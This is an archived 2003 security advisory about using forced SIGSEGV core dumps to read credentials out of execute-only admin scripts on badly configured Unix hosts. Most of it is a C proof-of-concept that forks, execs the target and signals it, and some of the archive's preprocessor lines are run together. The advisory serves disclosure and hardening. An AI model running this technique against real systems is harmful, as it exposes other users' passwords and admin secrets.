TUCoPS :: SunOS/Solaris :: sun5988.htm

Signal hooking allows to view process memory on badly configured hosts
13th Feb 2003 [SBWID-5988]
COMMAND

	Signal hooking allows to view process memory on badly configured hosts

SYSTEMS AFFECTED

	All ?

PROBLEM

	Jon Masters [jonathan@jonmasters.org] says :
	
	We all know that old chestnut about tracing setuid programs or  scripts,
	but what about non-setuid scripts which have been  installed  for  users
	and given execute only permission. For example, a lot of  sites  provide
	scripts for users to run which perform some admin related  function  and
	thus have usernames or passwords  within  them  -  potentially  free  to
	users.
	
	The thing I want to do is make a few people think about fixing  this  by
	taking whatever steps are necessary on a per-installation basis.  It  is
	a silly kind of thing which seems to be overlooked all too often.  There
	is some trivial code attached for those who really do not see my point.
	
	This is bound to be covered somewhere, I just want to get viewpoints.
	
	
	/* Include useful header files. */
	
	#include <stdio.h> #include <unistd.h>  #include  <sys/types.h>
	#include <sys/wait.h> #include <stdlib.h> #include <signal.h>
	
	#define CHILD_ARGV_LENGTH 2 #define TRUE 1
	
	int main(int argc, char *argv[]) {
	  
	  int child_pid = 0;
	  char *child_argv[CHILD_ARGV_LENGTH];
	  struct rlimit rlp;
	
	  if (argc != 2) {
	    printf("Usage:\n%s command\n",argv[0]);
	    exit(1);
	  }
	  child_argv[0] = argv[1];
	  
	  printf("The entertainment starts here...\n");
	  
	  if ((child_pid = fork()) == 0) {
	
	    if (getrlimit(RLIMIT_CORE, &rlp) != 0) {
	      printf("Could not get limits.\n");
	      exit(1);
	    } else {
	      printf("The current limit is: %d.\n",(int)rlp.rlim_cur);
	    }
	    printf("I am the child process and my process id is %d\n",
		   (int)getpid());
	
	    /* child_argv[0] = "./test_script.sh"; */
	    child_argv[1] = NULL;
	    printf("Invoking program: %s\n",child_argv[0]);
	    fflush(stdout);
	    if (execv(child_argv[0],child_argv) == -1) {
	      printf("A descriptive error message.\n");
	    }
	    /* system("/bin/ls"); */ /* An alternative which forks. */
	    printf("This point is never reached normally\n");
	  } else {
	    /* This is the horribly ugly bit where we sleep for an empirical amount of
	       time. Obviously this is not the correct way to write a general purpose
	       exploit - but that was not the point of this code. Go fix if you really
	       have no life :-) Perhaps some sem or other process sync can go here. */
	    usleep(10000);
	    while(TRUE) {
	      if (kill(child_pid,SIGSEGV) == 0) {
		printf("The package was delivered.\n");
		break;
	      }
	    }
	    waitpid(child_pid,NULL,0); /* could use wait() also. */
	  }
	  
	  printf("Main program exits normally\n");
	  return 0; /* return something */
	}
	

SOLUTION

	?

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH